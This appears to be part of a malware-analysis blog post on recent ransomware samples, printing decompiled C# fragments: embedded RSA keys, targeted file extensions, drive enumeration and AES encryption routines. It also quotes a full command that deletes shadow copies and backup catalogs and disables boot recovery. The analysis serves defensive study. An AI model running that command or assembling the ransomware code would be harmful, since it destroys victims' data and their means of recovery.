                                public static string DEMO_KEY_PRIVATE = "BwIAAACkAABSU0EyAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3zwglJxu5Q8S39zZe5sx0D5dOu/d2sS4JTBvO8q/ZaMCKEh3ngunldPVuoyplJ/2Xg3qa+1ZhSV3tyPZ4mL4zkp1IzbMYF1JKRFz1j+4RyMfUvprpGhdx/awOULSatR/B1h42lZqE7GcGJ1qZ7Vm+WQoI9UAzf68nq+t1MC0Rvv5TLK+nc7a5eZjJqPr4GaNrVqOgtQkzPumGOKS0e6ItQHHQwFuHOFZ+oB1JvM/4EXAPLLXAKCUmg+DFeOHn2+Qf37GlFFCS5gBL8zTlEy5QMSLBNRZuzDHG9Rz/9+oAYt8VF3aYnag4KIb9Ido3GCb/IXoxQ3MfNH3HUoZjZkvkuBf4F+rQ7QpJbUTHPjUzgzzHUoBk95SPyMAWubtsr9y/8IMJAXH6RBcPcGyZPZa+FsaPY8bpjvSqXhPHBYZ8bYkdaR0qQuPqF7HYoPW1v/fuDXYm08UzTKEjRgkmxbVhHCvsQHDDIvQ8VUf7OgPGnAP1IxsMloJEF3BVg3cCdpzjJQlfT/AbjOTjLwyc2MA7qXrJvi7b962NDkkrpDaZ1Rz5hWIiJPv5zV/jwscAlDFo9HryBH+2RaSN8LW6OhR/ZLYsyWmauyTOvzUPkIiYk5qsSmKctAlOy2FcQwdgOnXZDJqklhUmlzDS+Gk+nXgn0hWmDDYjCbZp/gy6ghgfTHIVNAEg5iUMLHdGy7gZrCuSo0CsvPBs0Z0DYAF88TAfhAeTfvhFILtmRIzig0E+OPI/F+jjMA7Uymb38cTzwA0AT9GEdJSIKXPhBzLVSKCgu8gMxnAOhRtWjZbpbPpCxvaGSGiRMLWHEhF73wy5595JCb1dAuvb9SYo2yDydQy1j/eAQ5BeG8fjSa5IjWVhyhR189kjN08twB+LpBKtsOsJWodXNxsR3vbaMoBcsVvIlynsfakVsbY+4d1ssinrrK5iSZwY4E4VhWK47WiHQSOM//6sO1qSDJBsMXyIEg4zKbT0dAfP5p3R7/TX3qi0Lpx6TvGppij6KvcQa1KEUiZEo5CJv08TgTgU0HS3QAj5VamRDc/m7dKGY4lz5u4aNLcyxgAOi4GVotTPyCKyya2HuLv6UAlW16tURm8asIniGcUG8tYjT+j3gtGr92Ww9niGz3wjtbffD9d4GX6SjAKpn7+fhJR+KFHZL6qfJqvziwFh7GyzF4QrMiwptkSkNhI=";
                                public static string DEMO_KEY_PUBLIC = "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3";
                                public static string DEMO_EXTENSIONS = "jpg,jpeg,png,tif,gif,bmp";
                                public static string ENCRYPTION_TOOL_FNAME = "ed.exe";
                                public static string ENCRYPTED_PRIVATE_KEY_FNAME = "key.encrypted";
                                public static string[] ALL_EXTENSIONS = new string[]
                                public static List<string> ListDrives()
                                                DriveInfo[] arg_0B_0 = DriveInfo.GetDrives();
                                                List<string> list = new List<string>();
                                                DriveInfo[] array = arg_0B_0;
                                                for (int i = 0; i < array.Length; i++)
                                                                DriveInfo driveInfo = array[i];
                                                                if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Removable || driveInfo.DriveType == DriveType.Network)
The above code snippet deals with keys, file extensions targeted and details about the encryption tool. We moved on to the next sample and it contains resources in the form of images for bitcoin details, ransom note details.
internal static Bitmap wannacry
                                return (Bitmap)Resources.ResourceManager.GetObject("wannacry", Resources.resourceCulture);

 Now we move to our final sample for analysis. It is very much interesting when we see the code.
// ed.CryptoFile
private static string[] _exProcesses = new string[]
This sample check for the presence of the anti-malware products present in the system. Further we see the Aes related code:
using (AesManaged aesManaged = new AesManaged())
                                                                aesManaged.Mode = CipherMode.CBC;
                                                                aesManaged.KeySize = 256;
                                                                aesManaged.Key = key;
                                                                aesManaged.IV = iv;
We shortened the cryptofile function in the following code snippet:
                public static class CryptoFile
                                public static long CRYPT_BYTES = 5242880L;
                                private static bool KillFileLockProcess(string path)
                                public static bool Encrypt(string path, byte[] publicKeyBlob)
                                public static bool Decrypt(string path, byte[] privateKeyBlob)
It also contains code to delete volume shadow copy services in this program and it as follows:
if (!(text == "-delshadowcopies"))
                                                                                                goto IL_52B;
                                                                                PS.ExecuteAndForget("cmd.exe", "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog –quiet");
                                                                                goto IL_52B;

Recent campaign of ransomware attacks giving numerous suggestions that it might done by threat actors or state sponsored attacks. Ukraine got specifically targeted in the last couple of weeks. Proper counter measures, periodic patches, timely assessment on host compromise, network compromise and vulnerability assessments can bring the organization in the safer side.

 Post made by 


Search results

Google Ads

Google Plus:


Total Pageviews


Hard work never fails!

Hard work never fails!